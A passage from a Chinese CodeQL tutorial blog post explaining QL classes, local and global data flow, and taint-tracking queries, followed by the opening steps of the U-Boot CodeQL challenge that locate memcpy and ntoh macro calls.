class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title 
class_">OneTwoThree</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">OneTwoThree</span>() &#123; <span class="comment">// characteristic predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">1</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">2</span> <span class="keyword">or</span> <span class="keyword">this</span> = <span class="number">3</span></span><br><span class="line">  &#125;</span><br><span class="line"> </span><br><span class="line">  string <span class="built_in">getAString</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    result = <span class="string">&quot;One, two or three: &quot;</span> + <span class="keyword">this</span>.<span class="built_in">toString</span>()</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  predicate <span class="built_in">isEven</span>() &#123; <span class="comment">// member predicate</span></span><br><span class="line">    <span class="keyword">this</span> = <span class="number">2</span></span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">select <span class="number">1.</span>(OneTwoThree).<span class="built_in">getAString</span>() <span class="comment">// 输出&quot;One, two or three: 1&quot;</span></span><br><span class="line"><span class="comment">//select 4.(OneTwoThree).getAString() // 无输出</span></span><br></pre></td></tr></table></figure><p>其中，<code>1.(OneTwoThree).getAString()</code>会将<code>int</code>类型的1转换为<code>OneTwoThree</code>类型。<strong>在转换的过程中会丢弃不满足<code>OneTwoThree</code>类中限定条件的数据</strong>。因此<code>4.(OneTwoThree).getAString()</code>将不会输出任何信息，因为整数4在转换的过程中被丢弃了。</p></li></ul></li><li><p>与C++类似，CodeQL中类里可以声明一个类字段，如下例所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">SmallInt</span> extends <span class="type">int</span> &#123;</span><br><span class="line">  <span class="built_in">SmallInt</span>() &#123; <span class="keyword">this</span> = [<span class="number">1</span> .. 
<span class="number">10</span>] &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> DivisibleInt extends SmallInt &#123;</span><br><span class="line">  SmallInt divisor;   <span class="comment">// declaration of the field `divisor`</span></span><br><span class="line">  <span class="built_in">DivisibleInt</span>() &#123; <span class="keyword">this</span> % divisor = <span class="number">0</span> &#125;</span><br><span class="line"></span><br><span class="line">  SmallInt <span class="built_in">getADivisor</span>() &#123; result = divisor &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DivisibleInt i</span><br><span class="line">select i, i.<span class="built_in">getADivisor</span>()</span><br></pre></td></tr></table></figure></li><li><p>需要注意的是，</p><ul><li><p>每个类都不能继承自己</p></li><li><p>不能继承final类</p></li><li><p>不能继承不相容的类</p><blockquote><p>这一点需要额外说明一下，从某个基类派生出的类，将拥有基类的所有数据集合范围。如果某个类继承了多个基类，那么<strong>该类内含的数据集合，将是两个基类数据集合的交集</strong>。</p></blockquote></li></ul></li></ul><blockquote><p>参考：<a href="https://help.semmle.com/QL/ql-handbook/types.html#classes">class - QL language reference</a></p></blockquote><h2 id="六、数据流分析与污点追踪">六、数据流分析与污点追踪</h2><blockquote><p>该部分内容主要 <s>参考</s> 翻译自：<a href="https://codeql.github.com/docs/codeql-language-guides/analyzing-data-flow-in-cpp/">Analyzing data flow in C and C++ - CodeQL documentation</a></p><p>参考了<a href="https://codeql.github.com/docs/writing-codeql-queries/about-data-flow-analysis/#about-data-flow-analysis">About data flow analysis</a>的部分内容</p></blockquote><ul><li>我们可以在CodeQL中，使用数据流分析来跟踪可能导致漏洞的潜在恶意数据流。</li><li>数据流分析可以分析出变量在程序中各节点上可能的值，并确定这些值如何在程序中传输以及使用方式。</li><li><strong>数据流</strong>分为两个部分：<strong>局部数据流</strong>以及<strong>全局数据流</strong></li></ul><h3 id="1-局部数据流">1. 局部数据流</h3><p><strong>局部数据流</strong>指的是在一个单独函数内的数据流。局部数据流比全局数据流分析的更加简单、迅速，同时也更加精确。</p><h4 id="a-使用局部数据流">a. 
使用局部数据流</h4><ul><li><p>局部数据流的库函数主要位于<code>DataFlow</code>模块中。该模块定义了一个类<code>Node</code>，这个类用于表示数据可以流经的任何元素。</p></li><li><p>而<code>Node</code>类分为两种，分别是表达式节点<code>ExprNode</code>与参数节点<code>ParameterNode</code>。我们可以使用谓词<code>asExpr</code>与<code>asParameter</code>，将数据流节点映射为对应的表达式或参数。</p><blockquote><p>注意：参数节点<code>ParameterNode</code>指的是<strong>当前函数参数</strong>的数据流节点。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Node</span> &#123;</span><br><span class="line">  <span class="comment">/** Gets the expression corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Expr <span class="title">asExpr</span><span class="params">()</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/** Gets the parameter corresponding to this node, if any. */</span></span><br><span class="line">  <span class="function">Parameter <span class="title">asParameter</span><span class="params">()</span> </span>&#123; ... 
&#125;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>或者使用谓词<code>exprNode</code>以及<code>parameterNode</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to expression `e`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ExprNode <span class="title">exprNode</span><span class="params">(Expr e)</span> </span>&#123; ... &#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Gets the node corresponding to the value of parameter `p` at function entry.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function">ParameterNode <span class="title">parameterNode</span><span class="params">(Parameter p)</span> </span>&#123; ... 
&#125;</span><br></pre></td></tr></table></figure></li><li><p>当数据可以从<code>nodeFrom</code>一步直接流向<code>nodeTo</code>时，谓词<code>localFlowStep(Node nodeFrom, Node nodeTo)</code>成立。该谓词可以通过使用符号<code>+</code>和<code>*</code>来进行递归调用，或者使用预定义好的递归谓词<code>localFlow</code>。</p><p>以下例子用于查找从参数<code>source</code>到表达式<code>sink</code>的数据流</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="b-使用局部污点追踪">b. 使用局部污点追踪</h4><ul><li><p>局部污点追踪在局部数据流的基础上，额外包含了不保留原值（non-value-preserving）的流动步骤，例如以下C++代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> i = <span class="built_in">tainted_user_input</span>();</span><br><span class="line">some_big_struct *array = <span class="built_in">malloc</span>(i * <span class="built_in">sizeof</span>(some_big_struct));</span><br></pre></td></tr></table></figure><p>由于变量<code>i</code>来自被污染的用户输入，因此使用了变量<code>i</code>的<code>malloc</code>函数参数也被污染。</p></li><li><p>局部污点追踪的库函数主要位于<code>TaintTracking</code>模块中。与局部数据流分析类似，污点追踪同样有谓词<code>localTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo)</code>用于污点分析，同样有递归版本的<code>localTaint</code>谓词。</p><p>一个简单的例子，查找从参数<code>source</code>到表达式<code>sink</code>的污点传播。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TaintTracking::<span class="built_in">localTaint</span>(DataFlow::<span class="built_in">parameterNode</span>(source), DataFlow::<span class="built_in">exprNode</span>(sink))</span><br></pre></td></tr></table></figure></li></ul><h4 id="c-例子">c. 
例子</h4><ul><li><p>这个例子是用于查找传入<code>fopen</code>函数的文件名称</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">select fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)</span><br></pre></td></tr></table></figure><p>但上面的ql代码只会将<strong>文件名参数</strong>的表达式输出，而这并不是可能传递给它的值。因此我们需要使用局部数据流分析来找到所有可流入该参数的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Expr src</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">exprNode</span>(src), DataFlow::<span class="built_in">exprNode</span>(fc.<span 
class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select src</span><br></pre></td></tr></table></figure><p>这样它将会输出可能流入<code>fopen</code>文件名参数的<strong>所有变量的表达式</strong>。</p><p>现在我们可以稍微将<code>source</code>改一下，将<code>exprNode</code>改成<code>parameterNode</code>，这样就可以查询出<strong>既是当前函数的参数，又可以作为<code>fopen</code>的文件名参数</strong>的表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line">from Function fopen, FunctionCall fc, Parameter p</span><br><span class="line">where fopen.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">  <span class="keyword">and</span> fc.<span class="built_in">getTarget</span>() = fopen</span><br><span class="line">  <span class="keyword">and</span> DataFlow::<span class="built_in">localFlow</span>(DataFlow::<span class="built_in">parameterNode</span>(p), DataFlow::<span class="built_in">exprNode</span>(fc.<span class="built_in">getArgument</span>(<span class="number">0</span>)))</span><br><span class="line">select p</span><br></pre></td></tr></table></figure></li><li><p>以下这个例子将会查找<strong>格式字符串中没有被硬编码</strong>的格式化函数的调用。</p><blockquote><p>格式化函数包括但不限于各种<code>printf</code>函数。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.commons.Printf</span><br><span class="line"></span><br><span class="line">from FormattingFunction format, FunctionCall call, Expr formatString</span><br><span class="line">where call.<span class="built_in">getTarget</span>() = format</span><br><span class="line">  <span class="keyword">and</span> call.<span class="built_in">getArgument</span>(format.<span class="built_in">getFormatParameterIndex</span>()) = formatString</span><br><span class="line">  <span class="keyword">and</span> <span class="keyword">not</span> <span class="built_in">exists</span>(DataFlow::Node source, DataFlow::Node sink |</span><br><span class="line">    DataFlow::<span class="built_in">localFlow</span>(source, sink) <span class="keyword">and</span></span><br><span class="line">    source.<span class="built_in">asExpr</span>() instanceof StringLiteral <span class="keyword">and</span></span><br><span class="line">    sink.<span class="built_in">asExpr</span>() = formatString</span><br><span class="line">  )</span><br><span class="line">select call, <span class="string">&quot;Argument to &quot;</span> + format.<span class="built_in">getQualifiedName</span>() + <span class="string">&quot; isn&#x27;t hard-coded.&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h3 id="2-全局数据流">2. 全局数据流</h3><p>全局数据流跟踪整个程序的数据流，因此比局部数据流更强大。但全局数据流的准确性不如本地数据流，并且通常需要更多的时间和内存来执行分析。</p><h4 id="a-使用全局数据流">a. 
Using global data flow</h4><p>To use the global data flow library, extend the <code>DataFlow::Configuration</code> class.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">MyDataFlowConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyDataFlowConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyDataFlowConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The <code>DataFlow::Configuration</code> class defines the following predicates:</p><ul><li><code>isSource</code>: <strong>defines where data may flow from</strong></li><li><code>isSink</code>: <strong>defines where data may flow to</strong></li><li><code>isBarrier</code>: optional, restricts the data flow</li><li><code>isBarrierGuard</code>: optional, restricts the data flow</li><li><code>isAdditionalFlowStep</code>: optional, adds additional flow steps</li></ul><p>The characteristic predicate <code>MyDataFlowConfiguration()</code> defines the name of the configuration, so replace <code>&quot;MyDataFlowConfiguration&quot;</code> with a name of your own.</p><p>Use the predicate <code>hasFlow(DataFlow::Node source, DataFlow::Node 
sink)</code> to run the global data flow analysis:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">from MyDataFlowConfiguration dataflow, DataFlow::Node source, DataFlow::Node sink</span><br><span class="line">where dataflow.<span class="built_in">hasFlow</span>(source, sink)</span><br><span class="line">select source, <span class="string">&quot;Data flow to $@.&quot;</span>, sink, sink.<span class="built_in">toString</span>()</span><br></pre></td></tr></table></figure><h4 id="b-使用全局污点追踪">b. Using global taint tracking</h4><p>Global taint tracking is to global data flow what local taint tracking is to local data flow: it extends global data flow with additional steps that do not preserve the value.</p><p>To use the global taint tracking library, extend the <code>TaintTracking::Configuration</code> class.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">MyTaintTrackingConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">MyTaintTrackingConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;MyTaintTrackingConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    
...</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    ...</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The configuration defines the following predicates:</p><ul><li><code>isSource</code>: defines where taint may flow from</li><li><code>isSink</code>: defines where taint may flow to</li><li><code>isSanitizer</code>: optional, restricts the taint flow</li><li><code>isSanitizerGuard</code>: optional, restricts the taint flow</li><li><code>isAdditionalTaintStep</code>: optional, adds additional taint steps</li></ul><p>Use the predicate <code>hasFlow(DataFlow::Node source, DataFlow::Node sink)</code> to run the taint tracking analysis.</p><h4 id="c-例子-2">c. Examples</h4><ul><li><p>The following data flow configuration tracks data flow <strong>from environment variables to opening files</strong>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.DataFlow</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EnvironmentToFileConfiguration</span> extends DataFlow::Configuration &#123;</span><br><span class="line">  <span 
class="built_in">EnvironmentToFileConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;EnvironmentToFileConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node source) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (Function getenv |</span><br><span class="line">      source.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>() = getenv <span class="keyword">and</span></span><br><span class="line">      getenv.<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;getenv&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node sink) &#123;</span><br><span class="line">    <span class="built_in">exists</span> (FunctionCall fc |</span><br><span class="line">      sink.<span class="built_in">asExpr</span>() = fc.<span class="built_in">getArgument</span>(<span class="number">0</span>) <span class="keyword">and</span></span><br><span class="line">      fc.<span class="built_in">getTarget</span>().<span class="built_in">hasQualifiedName</span>(<span class="string">&quot;fopen&quot;</span>)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from Expr getenv, Expr fopen, EnvironmentToFileConfiguration config</span><br><span class="line">where config.<span class="built_in">hasFlow</span>(DataFlow::<span class="built_in">exprNode</span>(getenv), DataFlow::<span class="built_in">exprNode</span>(fopen))</span><br><span class="line">select fopen, <span class="string">&quot;This &#x27;fopen&#x27; uses data 
from $@.&quot;</span>,</span><br><span class="line">  getenv, <span class="string">&quot;call to &#x27;getenv&#x27;&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>The following taint tracking configuration tracks data from calls to <code>ntohl</code> to array index operations. It uses the <code>Guards</code> library to recognize expressions that have been bounds-checked, defines <code>isSanitizer</code> to stop taint from propagating through them, and defines <code>isAdditionalTaintStep</code> to add flow from loop bounds to loop indexes.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.controlflow.Guards</span><br><span class="line"><span class="keyword">import</span> semmle.code.cpp.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title 
class_">NetworkToBufferSizeConfiguration</span> extends TaintTracking::Configuration &#123;</span><br><span class="line">  <span class="built_in">NetworkToBufferSizeConfiguration</span>() &#123; <span class="keyword">this</span> = <span class="string">&quot;NetworkToBufferSizeConfiguration&quot;</span> &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSource</span>(DataFlow::Node node) &#123;</span><br><span class="line">    node.<span class="built_in">asExpr</span>().(FunctionCall).<span class="built_in">getTarget</span>().<span class="built_in">hasGlobalName</span>(<span class="string">&quot;ntohl&quot;</span>)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSink</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(ArrayExpr ae | node.<span class="built_in">asExpr</span>() = ae.<span class="built_in">getArrayOffset</span>())</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isAdditionalTaintStep</span>(DataFlow::Node pred, DataFlow::Node succ) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(Loop loop, LoopCounter lc |</span><br><span class="line">      loop = lc.<span class="built_in">getALoop</span>() <span class="keyword">and</span></span><br><span class="line">      loop.<span class="built_in">getControllingExpr</span>().(RelationalOperation).<span class="built_in">getGreaterOperand</span>() = pred.<span class="built_in">asExpr</span>() |</span><br><span class="line">      succ.<span class="built_in">asExpr</span>() = lc.<span class="built_in">getVariableAccessInLoop</span>(loop)</span><br><span class="line">    )</span><br><span class="line">  
&#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">override</span> predicate <span class="built_in">isSanitizer</span>(DataFlow::Node node) &#123;</span><br><span class="line">    <span class="built_in">exists</span>(GuardCondition gc, Variable v |</span><br><span class="line">      gc.getAChild*() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      node.<span class="built_in">asExpr</span>() = v.<span class="built_in">getAnAccess</span>() <span class="keyword">and</span></span><br><span class="line">      gc.<span class="built_in">controls</span>(node.<span class="built_in">asExpr</span>().<span class="built_in">getBasicBlock</span>(), _)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from DataFlow::Node ntohl, DataFlow::Node offset, NetworkToBufferSizeConfiguration conf</span><br><span class="line">where conf.<span class="built_in">hasFlow</span>(ntohl, offset)</span><br><span class="line">select offset, <span class="string">&quot;This array offset may be influenced by $@.&quot;</span>, ntohl,</span><br><span class="line">  <span class="string">&quot;converted data from the network&quot;</span></span><br></pre></td></tr></table></figure></li></ul><h2 id="七、CodeQL-U-Boot-Challenge">七、CodeQL U-Boot Challenge</h2><ul><li><p>纸上得来终觉浅，绝知此事要躬行。简单翻阅QL文档是学不到什么的，我们需要自己动手实践一下。</p><p>下面笔者将讲述github learning lab中，用于学习CodeQL的一个入门课程 - <a href="https://lab.github.com/GitHubtraining/codeql-u-boot-challenge-(cc++)">CodeQL U-Boot Challenge (C/C++)</a></p></li><li><p>Step1: 了解从何处获取帮助</p><ul><li><a href="https://lgtm.com/help/lgtm/console/ql-cpp-basic-example">Writing a basic C++ Code QL query</a></li><li><a href="https://help.semmle.com/QL/learn-ql/introduction-to-ql.html">Introduction to CodeQL</a></li><li><a href="https://help.semmle.com/QL/learn-ql/">Learning 
CodeQL</a></li></ul></li><li><p>Step2: 设置IDE</p><ul><li>下载VSCode以及CodeQL插件，还有CodeQL CLI文件。</li><li>下载<a href="https://github.com/github/vscode-codeql-starter/">CodeQL starter</a>工作区</li><li>下载<a href="https://downloads.lgtm.com/snapshots/cpp/uboot/u-boot_u-boot_cpp-srcVersion_d0d07ba86afc8074d79e436b1ba4478fa0f0c1b5-dist_odasa-2019-07-25-linux64.zip">U-Boot CodeQL database</a>并解压</li><li>克隆<a href="https://github.com/Kiprey/codeql-uboot">当前github课程仓库</a></li><li>将当前课程仓库的文件夹添加至之前下载的VScode starter工作区，同时将之前下载的U-Boot数据库导入至VScode</li><li>一切就绪!</li></ul></li><li><p>Step3: 编写一个简单的查询。在这里我们用于查询<code>strlen</code>函数的定义位置。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;strlen&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named strlen&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step4: 分析这个简单的查询，之后查询一下<code>memcpy</code>函数</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Function f</span><br><span class="line">where f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select f, <span class="string">&quot;a function named 
memcpy&quot;</span></span><br></pre></td></tr></table></figure></li><li><p>Step5: Use different classes and predicates. Here we write a query that finds the macro definitions named <code>ntohs</code>, <code>ntohl</code>, and <code>ntohll</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from Macro macro</span><br><span class="line"><span class="comment">//where macro.getName() = &quot;ntohs&quot; or macro.getName() = &quot;ntohl&quot; or macro.getName() = &quot;ntohll&quot;</span></span><br><span class="line">where macro.<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select macro</span><br></pre></td></tr></table></figure></li><li><p>Step6: Relate two variables. Using several variables lets us describe more complex relationships in the code; here we find the call sites of a specific function.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from FunctionCall c, Function f</span><br><span class="line">where c.<span class="built_in">getTarget</span>() = f <span class="keyword">and</span> f.<span class="built_in">getName</span>() = <span class="string">&quot;memcpy&quot;</span></span><br><span class="line">select c</span><br></pre></td></tr></table></figure></li><li><p>Step7: Apply the technique from Step6 to find the invocations of the macros.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation invoc</span><br><span class="line">where invoc.<span class="built_in">getMacroName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select invoc</span><br></pre></td></tr></table></figure></li><li><p>Step8: 改变select的输出。查找这些宏调用所扩展到的顶级表达式。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> cpp</span><br><span class="line"></span><br><span class="line">from MacroInvocation mi</span><br><span class="line">where mi.<span class="built_in">getMacro</span>().<span class="built_in">getName</span>().<span class="built_in">regexpMatch</span>(<span class="string">&quot;ntoh(s|l|ll)&quot;</span>)</span><br><span class="line">select mi.<span 